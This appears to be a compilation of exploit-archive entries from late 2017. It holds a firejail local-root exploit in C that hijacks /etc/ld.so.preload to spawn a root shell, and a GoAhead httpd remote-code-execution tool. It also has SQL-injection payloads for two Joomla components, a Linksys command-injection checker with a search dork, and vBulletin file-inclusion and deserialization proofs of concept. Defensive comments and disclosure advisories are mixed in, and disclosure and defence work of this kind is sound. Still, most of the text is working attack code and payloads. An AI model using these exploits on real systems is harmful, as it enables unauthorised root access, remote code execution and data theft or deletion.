/* firejail local root exploit (host to host)
*
* (C) 2017 Sebastian Krahmer under the GPL.
*
* WARNING: This exploit uses ld.so.preload technique.
* If you are in bad luck, you may end up with an unusable system.
* SO BE WARNED. ONLY TEST IT IN YOUR SAFE VM's.
*
* Get the beauty that this is a shared lib and a running
* executable at the same time, as we tamper with /etc/ld.so.preload
*
* Therefore you have to compile it like this:
*
* $ cc -fPIC -fpic -std=c11 -Wall -pedantic -c firenail.c
* $ gcc -shared -pie firenail.o -o firenail
* $ ./firenail
*
* DO NOT TELL ME THAT SELINUX WOULD HAVE PREVENTED THIS EXPLOIT.
* IF I WAS ABOUT TO BYPASS SELINUX ALONG, I WOULD HAVE DONE THE
* EXPLOIT DIFFERENTLY.
*
* Analysis: Sandboxing is cool, but it has to be done right.
* Firejail has too broad attack surface that allows users
* to specify a lot of options, where one of them eventually
* broke by accessing user-files while running with euid 0.
* There are some other similar races. Turns out that it can be
* _very difficult_ to create a generic sandbox suid wrapper thats
* secure but still flexible enough to sandbox arbitrary binaries.
*
* Tested with latest commit 699ab75654ad5ab7b48b067a2679c544cc8725f6.
*/
#define _POSIX_C_SOURCE 200212
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
/* Path the dynamic loader consults for objects to map into every dynamically
 * linked program (see ld.so(8)).  It is the symlink target created in main()
 * and the file the constructor init() removes once it has run. */
const char *const ldso = "/etc/ld.so.preload";
/* Forward declaration; the definition follows die() below. */
int main();
/* Runs automatically whenever this object is mapped into a process (GCC
 * constructor attribute).  As the header explains, once main() has listed
 * this binary in /etc/ld.so.preload the loader maps it into every
 * dynamically linked program, setuid ones included, so this code also runs
 * inside the root-privileged /bin/su started at the end of main().
 *
 * Defender notes: /etc/ld.so.preload is normally absent on a stock system;
 * any creation of or write to it, and any user-owned symlink pointing at
 * it, is a high-value detection (file-integrity monitoring, auditd watch).
 */
__attribute__((constructor)) void init(void)
{
    /* Stay inert in unprivileged processes (including the exploit's own
     * ./firenail run), so ordinary programs keep working for the user. */
    if (geteuid())
        return;
    /* Remove the preload entry again so later processes are not affected. */
    unlink(ldso);
    /* --noprofile/--norc are bash options; presumably /bin/sh is bash here. */
    char *sh[] = {"/bin/sh", "--noprofile", "--norc", NULL};
    /* Return values of setuid()/setgid() are not checked. */
    setuid(0);
    setgid(0);
    execve(*sh, sh, NULL);
    /* Only reached if execve() failed. */
    exit(1);
}
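/* Report the failed step in perror() style and terminate.
 *
 * s: prefix for the diagnostic (the step that failed).
 *
 * errno is captured before perror() runs: perror() itself can fail (for
 * example when stderr is closed) and then sets errno, which the original
 * code would have passed to exit() as the status.  exit() keeps only the
 * low 8 bits of the status.  Never returns.
 */
void die(const char *s)
{
    int saved = errno;
    perror(s);
    exit(saved);
}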
/* Exploit driver; runs as the unprivileged user (see the header for how to
 * build and start it).  The sequence below is exactly what the code does:
 *   1. resolve this binary's own path via /proc/self/exe (written into the
 *      preload file in step 4);
 *   2. create $HOME/.firenail and symlink .firenail/.Xauthority to
 *      /etc/ld.so.preload;
 *   3. run "firejail --private=.firenail /usr/bin/id";
 *   4. open /etc/ld.so.preload read-write, truncate it and write our path;
 *   5. execve /bin/su so that the loader preloads this object into it and
 *      the constructor init() runs with euid 0.
 *
 * NOTE(review): what firejail does to the .Xauthority symlink between steps
 * 3 and 4 is not shown in this file; the header ("accessing user-files
 * while running with euid 0") and the unconditional O_RDWR open imply the
 * symlink target ends up writable for the user.  Confirm against the
 * --private handling in the commit named in the header.
 *
 * Defender notes: every step leaves a durable artefact — a user-owned
 * ~/.firenail/.Xauthority link to /etc/ld.so.preload, and a
 * /etc/ld.so.preload whose single entry points into a home directory.
 * Both are cheap to audit for.
 *
 * Returns: never normally; die() exits on any failure and execve() replaces
 * the process, so the trailing return -1 is unreachable.
 */
int main()
{
    printf("[*] fire(j|n)ail local root exploit 2017\n\n");
    /* me: our own path.  readlink() does not NUL-terminate, hence the
     * zero-filled buffer and the sizeof - 1 length. */
    char me[4096] = {0}, *home = getenv("HOME");
    if (!home)
        die("[-] no $HOME");
    if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0)
        die("[-] Unable to find myself");
    /* Scratch directory under $HOME.  snprintf() always terminates, so the
     * - 1 is redundant; a very long $HOME would be silently truncated. */
    char path[256] = {0};
    snprintf(path, sizeof(path) - 1, "%s/.firenail", home);
    if (mkdir(path, 0700) < 0 && errno != EEXIST)
        die("[-] mkdir");
    /* Plant the symlink.  EEXIST is tolerated whatever the existing entry is. */
    snprintf(path, sizeof(path) - 1, "%s/.firenail/.Xauthority", home);
    if (symlink(ldso, path) < 0 && errno != EEXIST)
        die("[-] symlink");
    /* Trigger: the setuid firejail wrapper with our directory as --private
     * home.  /usr/bin/id is merely something harmless to run inside the
     * sandbox; system()'s return value is not checked. */
    system("firejail --private=.firenail /usr/bin/id");
    /* If the trigger worked, /etc/ld.so.preload can now be truncated and
     * rewritten to name this binary.  Short or failed writes are unchecked. */
    int fd = open(ldso, O_RDWR|O_TRUNC);
    if (fd < 0)
        die("[-] open");
    write(fd, me, strlen(me));
    write(fd, "\n", 1);
    close(fd);
    /* su is typically setuid root; with our path in the preload file the
     * loader maps this object into it and init() runs before su does. */
    char *su[] = {"/bin/su", NULL};
    execve(*su, su, NULL);
    die("[-] execve su");
    return -1;
}
# # # # #
# Exploit Title: Joomla! Component My Projects 2.0 - SQL Injection
# Dork: N/A
# Date: 18.12.2017
# Vendor Homepage: http://www.gegabyte.org/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/my-projects/
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php/component/myproject/VerAyari[SQL]
#
# 'and%20(select%201%20from%20(select%20count(*)%2cconcat((select(select%20concat(cast(database()%20as%20char)%2c0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20AND%20''='
#
# # # # #
#!/usr/bin/python
# GoAhead httpd/2.5 to 3.6.5 LD_PRELOAD remote code execution exploit
# EDB Note: Payloads ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43360.zip
# EDB Note: Source ~ https://www.elttam.com.au/blog/goahead/
# EDB Note: Source ~ https://github.com/elttam/advisories/blob/c778394dfe454083ebdfb52f660fd3414ee8adb8/CVE-2017-17562/
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++++++++:--/++++++++++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++++/:-......-:/++++++++++++++++++++++++++++++++
#++++++++++++++++++++++/////::-..............-:://///+++++++++++++++++++++++
#++++++++++++++++++++++..............-:..............+++++++++++++++++++++++
#++++++++++++++++++++++..........-://+++/:-..........+++++++++++++++++++++++
#++++++++++++++++++++++......://++++++++++++//::.....+++++++++++++++++++++++
#++++++++++++++++++++++......++++++++++++++++++/.....+++++++++++++++++++++++
#++++++++++++++++++++++......:/+++++++++++++++/-.....+++++++++++++++++++++++
#++++++++++++++++++++++.........--::////:::--........+++++++++++++++++++++++
#++++++++++++++++++++++-...........................:/+++++++++++++++++++++++
#++++++++++++++++++++++:.....-................--:/++++++++++++++++++++++++++
#+++++++++++++++++++++++-....-+///::::::::///+++++++++++++++++++++++++++++++
#+++++++++++++++++++++++/.....-/++++++++++++++++/::+++++++++++++++++++++++++
#++++++++++++++++++++++++/-.....-/++++++++/:--...-/+++++++++++++++++++++++++
#++++++++++++++++++++++++++:.......:/++/:.......:+++++++++++++++++++++++++++
#+++++++++++++++++++++++++++/-................-/++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++/:-..........-:/++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++/:--..--:/+++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++(c) 2017 elttam Pty Ltd.+++
# ~/goahead_exploit>>> ./makemyday.py -h
# usage: makemyday.py [-h] [--server SERVER] [--port PORT] [--maxconn {1-256}]
# [--verbose]
# {fingerprint,stage,exploit,findcgi} ...
#
# GoAhead httpd remote LD_PRELOAD exploit.
#
# positional arguments:
# {fingerprint,stage,exploit,findcgi}
# fingerprint fingerprint if GoAhead server uses CGI
# stage send a staging payload and wait indefinitely
# exploit run exploit
# findcgi brute force cgi script names
#
# optional arguments:
# -h, --help show this help message and exit
# --server SERVER target ip or hostname, default is localhost
# --port PORT target port, default is 80
# --maxconn {1-256} max concurrent requests, default is 1
# --verbose, -v increase verbosity level
#
# See https://www.elttam.com.au for more information.
# >>>./makemyday.py --server 192.168.1.24 --port 80 exploit --payload ./payloads/X86_64-hw.so
# exploit works!
import argparse
import httplib
import sys
import threading
from string import Template
class GoAheadExploit(object):
    '''Command-line driver for the GoAhead CGI LD_PRELOAD issue (CVE-2017-17562,
    see the EDB notes above).

    Subcommands are dispatched by name from __init__: fingerprint, findcgi,
    stage and exploit.  The request built in do_exploit() puts an LD_PRELOAD
    key into the query string and the shared object into the POST body;
    evidently the vulnerable server copies that key into the CGI child's
    environment, so the loader maps /proc/self/fd/0 as a library.
    Defensive takeaway: a CGI front end must allowlist the environment
    variable names it derives from request data.
    '''
    qid = None          # not referenced anywhere in this listing
    payload = None      # shared-object bytes, read lazily in do_exploit()
    exploited = False   # set once verify() accepts a response; ends the loops

    def __init__(self):
        '''Build the argument parser, parse sys.argv and call the method
        named by the chosen subcommand.'''
        parser = argparse.ArgumentParser(
            description="GoAhead httpd remote LD_PRELOAD exploit.",
            epilog="See https://www.elttam.com.au for more information."
        )
        parser.add_argument('--server', default="localhost",
                            help='target ip or hostname, default is localhost')
        parser.add_argument('--port', type=int, default=80,
                            help='target port, defaults is 80')
        parser.add_argument('--maxconn', type=int, default=1, choices=xrange(1, 256),
                            metavar="{1-256}", help='max concurrent requests, default is 1')
        # --verbose is parsed but not consulted anywhere in this listing
        parser.add_argument('--verbose', '-v', default=0, action='count',
                            help='increase verbosity level')
        # options shared by the two subcommands that send a payload
        common_options = argparse.ArgumentParser(add_help=False)
        common_options.add_argument('--cginame', default="cgitest",
                                    help='target cgi script')
        common_options.add_argument('--payload', nargs='?',
                                    type=argparse.FileType('r'), default=sys.stdin,
                                    help='shared object file to execute (defaults to stdin)')
        cmd_subparsers = parser.add_subparsers(dest="action")
        cmd_subparsers.add_parser(
            'fingerprint', help='fingerprint if GoAhead server uses CGI')
        cmd_subparsers.add_parser('stage', parents=[common_options],
                                  help='send a staging payload and wait indefinitely')
        cmd_subparsers.add_parser('exploit', parents=[common_options],
                                  help='run exploit')
        findcgi = cmd_subparsers.add_parser(
            'findcgi', help='brute force cgi script names')
        findcgi.add_argument('--wordlist', nargs='?',
                             type=argparse.FileType('r'), default=sys.stdin,
                             help='list of cgi filenames to brute force (defaults to stdin)')
        # parse command line and call into action
        self.args = parser.parse_args()
        # the subcommand name doubles as the method name
        getattr(self, self.args.action)()

    def fingerprint(self):
        '''Probe whether CGI handling is active.

        Requests a /cgi-bin/ name that should not exist and treats GoAhead's
        "CGI process file does not exist" error text in the body as proof
        that the CGI handler is enabled.
        '''
        conn = httplib.HTTPConnection(self.args.server, self.args.port)
        conn.connect()
        conn.request(
            "GET", "/cgi-bin/c8fed00eb2e87f1cee8e90ebbe870c190ac3848c")
        if conn.getresponse().read().find("CGI process file does not exist") != -1:
            print "CGI scripting is enabled"
        else:
            print "CGI scripting is disabled"
        conn.close()

    def findcgi(self):
        '''Request every name from --wordlist under /cgi-bin/ and report
        those answering HTTP 200.  One connection per name.'''
        for cginame in self.args.wordlist.readlines():
            # strip the trailing newline (assumes every line has one)
            cginame = cginame[:-1]
            conn = httplib.HTTPConnection(self.args.server, self.args.port)
            conn.connect()
            conn.request("GET", "/cgi-bin/" + cginame)
            resp = conn.getresponse()
            if resp.status == 200:
                print "/cgi-bin/" + cginame + " exists."
            conn.close()

    def stage(self):
        '''POST the payload to the CGI script without the LD_PRELOAD trick.

        Content-Length is advertised as one byte more than is sent;
        together with the help text ("wait indefinitely") this presumably
        keeps the CGI child blocked on stdin.  A malformed status line from
        the server is ignored.
        '''
        payload = self.args.payload.read()
        headers = {"Host": self.args.server,
                   "User-Agent": "curl/7.51.0",
                   "Accept": "*/*",
                   "Content-Length": str(len(payload) + 1)}
        conn = httplib.HTTPConnection(self.args.server, self.args.port)
        conn.connect()
        conn.request("POST", "/cgi-bin/" + self.args.cginame, payload, headers)
        try:
            conn.getresponse()
        except httplib.BadStatusLine:
            pass
        conn.close()

    def exploit(self):
        '''Run do_exploit() with the module-level verify() callback, --maxconn
        times.'''
        for _ in range(0, self.args.maxconn):
            # NOTE(review): this passes the *result* of do_exploit(verify) to
            # Thread() rather than a target, so do_exploit() runs to
            # completion synchronously inside this loop.
            tid = threading.Thread(self.do_exploit(verify,))
            tid.start()

    def do_exploit(self, verify_callback):
        '''POST the shared object to /cgi-bin/<cginame>?LD_PRELOAD=/proc/self/fd/0
        until verify_callback() accepts a response.

        verify_callback: callable taking an httplib response and returning
        True on success (see verify() at module level).  There is no attempt
        limit: a server that never satisfies the callback keeps this looping.
        '''
        if not self.payload:
            self.payload = self.args.payload.read()
        contentlen = len(self.payload)
        headers = {"Host": self.args.server,
                   "User-Agent": "curl/7.51.0",
                   "Accept": "*/*",
                   "Content-Length": str(contentlen)}
        exploit_string = Template("/cgi-bin/${cginame}?LD_PRELOAD="
                                  "/proc/self/fd/0").substitute({
                                      "cginame": self.args.cginame
                                  })
        while not self.exploited:
            conn = httplib.HTTPConnection(self.args.server, self.args.port, timeout=10)
            conn.connect()
            conn.request("POST", exploit_string, self.payload, headers)
            try:
                if verify_callback(conn.getresponse()):
                    self.exploited = True
                    print "exploit works!"
            except httplib.BadStatusLine:
                # presumably the CGI child died or wrote garbage; just retry
                pass
            conn.close()
# put your payload callback/verification code here
def verify(res):
    '''Validation callback for do_exploit().

    ``res`` is an httplib response.  Success is signalled by a non-empty
    "hello" response header — presumably added by the bundled payload.
    Returns True when that header is present and truthy, False otherwise.
    '''
    return bool(res.getheader("hello"))
if __name__ == '__main__':
    # Constructing the object parses the command line and runs the subcommand.
    GoAheadExploit()
# SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution
Source: https://blogs.securiteam.com/index.php/archives/3569
## Vulnerability Summary
The following advisory describes an unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5.
vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage.
## Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
## Vendor response
We have tried to contact vBulletin since November 21, 2017; repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
## Vulnerability details
vBulletin contains a vulnerability that can allow a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code.
An unauthenticated user can send a GET request to /index.php whose routestring= parameter triggers the file inclusion vulnerability.
A crafted request to a vBulletin server installed on Windows allows an attacker to include any file on the web server.
**Listing of /index.php:**
```
/* 48 */ $app = vB5_Frontend_Application::init('config.php');
/* 49 */ //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini
/* 50 */ //file to catch these situations.
/* 51 */ // We report all errors here because we have to make Application Notice free
/* 52 */ error_reporting(E_ALL | E_STRICT);
/* 53 */
/* 54 */ $config = vB5_Config::instance();
/* 55 */ if (!$config->report_all_php_errors) {
/* 56 */ // Note that E_STRICT became part of E_ALL in PHP 5.4
/* 57 */ error_reporting(E_ALL & ~(E_NOTICE | E_STRICT));
/* 58 */ }
/* 59 */
/* 60 */ $routing = $app->getRouter();
/* 61 */ $method = $routing->getAction();
/* 62 */ $template = $routing->getTemplate();
/* 63 */ $class = $routing->getControllerClass();
/* 64 */
/* 65 */ if (!class_exists($class))
/* 66 */ {
/* 67 */ // @todo - this needs a proper error message
/* 68 */ die("Couldn't find controller file for $class");
/* 69 */ }
/* 70 */
/* 71 */ vB5_Frontend_ExplainQueries::initialize();
/* 72 */ $c = new $class($template);
/* 73 */
/* 74 */ call_user_func_array(array(&$c, $method), $routing->getArguments());
/* 75 */
/* 76 */ vB5_Frontend_ExplainQueries::finish();
```
**Let’s take a closer look on vB5_Frontend_Application::init() – Listing of /includes/vb5/frontend/application.php:**
```
/* 15 */ public static function init($configFile)
/* 16 */ {
/* 17 */ parent::init($configFile);
/* 18 */
/* 19 */ self::$instance = new vB5_Frontend_Application();
/* 20 */ self::$instance->router = new vB5_Frontend_Routing();
/* 21 */ self::$instance->router->setRoutes();
/* ... */
```
We can see that setRoutes() is called:
**Listing of /includes/vb5/frontend/routing.php:**
```
/* 47 */ public function setRoutes()
/* 48 */ {
/* 49 */ $this->processQueryString();
/* 50 */
/* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it
/* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : '';
/* 53 */
/* 54 */ if (isset($_GET['routestring']))
/* 55 */ {
/* 56 */ $path = $_GET['routestring'];
/* ... */
/* 73 */ }
/* 74 */
/* 75 */ if (strlen($path) AND $path{0} == '/')
/* 76 */ {
/* 77 */ $path = substr($path, 1);
/* 78 */ }
/* 79 */
/* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them
/* 81 */ if (strlen($path) > 2 )
/* 82 */ {
/* 83 */ $ext = strtolower(substr($path, -4)) ;
/* 84 */ if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css')
/* 85 */ OR (strtolower(substr($path, -3)) == '.js') )
/* 86 */ {
/* 87 */ header("HTTP/1.0 404 Not Found");
/* 88 */ die('');
/* 89 */ }
/* 90 */ }
/* 91 */
/* 92 */ try
/* 93 */ {
/* 94 */ $message = ''; // Start with no error.
/* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING']));
/* 96 */ }
/* 97 */ catch (Exception $e)
/* 98 */ {
/* ... */
/* 106 */ }
/* ... */
/* 127 */ if (!empty($route))
/* 128 */ {
/* ... */
/* 188 */ }
/* 189 */ else
/* 190 */ {
/* 191 */ // if no route was matched, try to parse route as /controller/method
/* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/'));
/* ... */
/* 229 */ }
/* 230 */
/* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle
/* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll
/* 233 */ //handle deeper paths via more standard routes.
/* 234 */ if (strpos($path, '/') === false)
/* 235 */ {
/* 236 */ $this->controller = 'relay';
/* 237 */ $this->action = 'legacy';
/* 238 */ $this->template = '';
/* 239 */ $this->arguments = array($path);
/* 240 */ $this->queryParameters = array();
/* 241 */ return;
/* 242 */ }
/* 243 */
/* 244 */ vB5_ApplicationAbstract::checkState();
/* 245 */
/* 246 */ throw new vB5_Exception_404("invalid_page_url");
/* 247 */ }
```
So if our routestring does not end with ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ and does not contain the ‘/’ character, vBulletin will call the legacy() method of vB5_Frontend_Controller_Relay – /includes/vb5/frontend/controller/relay.php:
```
// Reviewer note: $file is the routestring as left by setRoutes() (which only
// rejects paths containing '/' and a few image/css/js suffixes) and is
// forwarded to relay() with no further validation.
/* 63 */ public function legacy($file)
/* 64 */ {
/* 65 */ $api = Api_InterfaceAbstract::instance();
/* 66 */ $api->relay($file);
/* 67 */ }
```
If we check relay() in the Api_Interface_Collapsed class – /include/api/interface/collapsed.php:
```
/* 117 */ public function relay($file)
/* 118 */ {
/* 119 */ $filePath = vB5_Config::instance()->core_path . '/' . $file;
/* 120 */
/* 121 */ if ($file AND file_exists($filePath))
/* 122 */ {
/* 123 */ //hack because the admincp/modcp files won't return so the remaining processing in
/* 124 */ //index.php won't take place. If we better integrate the admincp into the
/* 125 */ //frontend, we can (and should) remove this.
/* 126 */ vB_Shutdown::instance()->add(array('vB5_Frontend_ExplainQueries', 'finish'));
/* 127 */ require_once($filePath);
/* 128 */ }
/* ... */
```
As we can see, an attacker is not able to use ‘/’ in $file, so on Linux the current directory cannot be left. On Windows, however, ‘\’ is also accepted as a path delimiter, so the attacker can specify any desired file (the ‘\..\’ traversal trick works as well) and PHP will include it.

If we want to include a file with an extension like ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’, we need to bypass the check in setRoutes() mentioned above. This is easily done by appending a dot (‘.’) or a space (‘%20’) to the filename.
## Proof of Concept
We can check if the server is vulnerable by sending the following GET request:
```
/index.php?routestring=.\\
```
If the response is:

The server is vulnerable.
If we want to inject a php code to any file on the server we can use the access.log for example:
```
/?LogINJ_START=<?php phpinfo();?>LogINJ_END
```
After that we can include access.log with our PHP code:
```
/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log
```

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection
"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>
$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""
import requests
def check(url):
    '''Return True when the device at ``url`` appears to run an injected command.

    The probe string is sent as the User-Agent header (see
    send_http_request) and the response body is searched for
    "config.webui sys_cmd" lines that contain both the injected text and
    the md5 noted in the inline comment below.  How that hash surfaces in
    the response is not shown in this file.  Prints a success banner and
    returns True; returns False on any missing indicator or failed request.

    Python 2 semantics are assumed (shebang): filter() returns a list that
    can be scanned twice.  Under Python 3 it would be an iterator exhausted
    by the first any().
    '''
    payload = '"; echo "admin'
    md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum
    resp = send_http_request(url, payload)
    if not resp:
        return False
    lines = resp.text.splitlines()
    sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)
    # the injected text must be reflected verbatim ...
    if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
        return False
    # ... and so must the expected hash
    if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
        return False
    print("[+] Target is exploitable by CVE-2017-17411 ")
    return True
def send_http_request(url, payload):
    '''GET ``url`` with ``payload`` as the User-Agent header.

    Returns the requests response object, or None when the request raised.

    NOTE(review): ``log`` is not defined anywhere in this file, so a failed
    request raises NameError inside the except clause instead of returning
    None as intended.
    '''
    headers = {
        'User-Agent': payload
    }
    response = None
    try:
        response = requests.get(url, headers=headers)
    except Exception as err:
        log.exception(err)
    return response
if __name__ == '__main__':
    import sys
    # exactly one argument expected: the device's base URL
    # (note: a usage error exits with status 0)
    if len(sys.argv) != 2:
        print("[*] Usage: python %s <URL>" % sys.argv[0])
        sys.exit(0)
    check(sys.argv[1])
# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"
## References
# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html
# SSD Advisory – vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion
Source: https://blogs.securiteam.com/index.php/archives/3573
## Vulnerability Summary
The following advisory describes an unauthenticated deserialization vulnerability that leads to arbitrary file deletion and, under certain circumstances, code execution found in vBulletin version 5.
vBulletin, also known as vB, is “a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage”.
## Credit
A security researcher from TRUEL IT (@truel_it) has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
## Vendor response
We have tried to contact vBulletin since November 21, 2017; repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
CVE: CVE-2017-17672
## Vulnerability details
Unsafe usage of PHP’s unserialize() on user-supplied input allows an unauthenticated attacker to delete arbitrary files and, under certain circumstances, execute arbitrary code on a vBulletin installation.
vB_Library_Template’s cacheTemplates() function is a publicly exposed API that fetches information on a set of given templates from the database in order to store them inside a cache variable.
File core/vb/api/template.php – function cacheTemplates():
```
public function cacheTemplates($templates, $templateidlist, $skip_bbcode_style = false,
$force_set = false)
{
return vB_Library::instance('template')->cacheTemplates($templates, $templateidlist, $skip_bbcode_style, $for
```
Let’s take a look at $templateidlist – core/vb/library/template.php – function cacheTemplates():
```
// Reviewer note: $templateidlist arrives from the public API wrapper in
// core/vb/api/template.php (listed above) and, unless it is already an array,
// is handed to unserialize() unchanged.  unserialize() on attacker-controlled
// data instantiates arbitrary classes and runs their magic methods — the root
// cause of CVE-2017-17672.  Mitigation: accept only an array/JSON form, or
// call unserialize() with array('allowed_classes' => false) (PHP 7+).
public function cacheTemplates($templates, $templateidlist, $skip_bbcode_style = false,
	$force_set = false)
{
	$vboptions = vB::getDatastore()
	// vB_Library_Style::switchCssStyle() may pass us a templateidlist that's already unserialized.
	if (!is_array($templateidlist))
	{
		// untrusted input reaches unserialize() here
		$templateidlist = unserialize($templateidlist);
	}
	foreach ($templates AS $template)
	{
		// indexing the deserialized object here is what produces the
		// "Cannot use object of type ... as array" error seen in the PoC response
		if (isset($templateidlist[$template]))
		{
			$templateids[] = intval($templateidlist[$template]);
		}
	}
	if (!empty($templateids))
	{
		$temps = vB::getDbAssertor(array('title', 'textonly', 'template_un', 'template'));
		// cache templates
		foreach ($temps as $temp)
		{
			if (empty(self::$templatecache["$temp[title]"]) OR $force_set)
			{
				self::$templatecache["$temp[title]"] = $this;
			}
		}
	}
	if (!$skip_bbcode_style)
	{
		self::$bbcode_style = array(
			'code' => &$templateassoc['bbcode_code_styleid'],
			'html' => &$templateassoc['bbcode_html_styleid'],
			'php' => &$templateassoc['bbcode_php_styleid'],
			'quote' => &$templateassoc['bbcode_quote_styleid']
		);
	}
}
```
The $templateidlist variable, which can come directly from user input, is supplied directly to unserialize(), resulting in an arbitrary deserialization primitive.
## Proof of Concept
By sending the following POST request an unauthenticated attacker can delete files from the victim’s server:
```
POST /vb533/ajax/api/template/cacheTemplates HTTP/1.1
Host: vb533.test
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:13:"/path/to/file";}
```
The server then will respond with:
```
HTTP/1.1 200 OK
Date: Fri, 27 Oct 2017 09:27:52 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: sessionhash=409d8f4b16ebb55471e63509834d0eff; path=/; HttpOnly
Set-Cookie: lastvisit=1509096472; path=/; HttpOnly
Set-Cookie: lastactivity=1509096472; path=/; HttpOnly
Set-Cookie: sessionhash=44b1e8d2d433031ec2501649630dd8bf; path=/; HttpOnly
Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0
Expires: Sat, 1 Jan 2000 01:00:00 GMT
Last-Modified: Fri, 27 Oct 2017 09:27:52 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2101
Connection: close
Content-Type: application/json; charset=UTF-8
{"errors":[["unexpected_error","Cannot use object of type vB_Image_ImageMagick as array"]]}
```
# # # # #
# Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection
# Dork: N/A
# Date: 19.12.2017
# Vendor Homepage: hhttp://nextgeneditor.com/
# Software Link: https://extensions.joomla.org/extension/nextgen-editor/
# Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free
# Version: 2.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL]
#
# %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d
#
# # # # #
# Exploit Title: BrightSign Digital Signage (Multiple Vulnerabilities)
# Date: 12/15/17
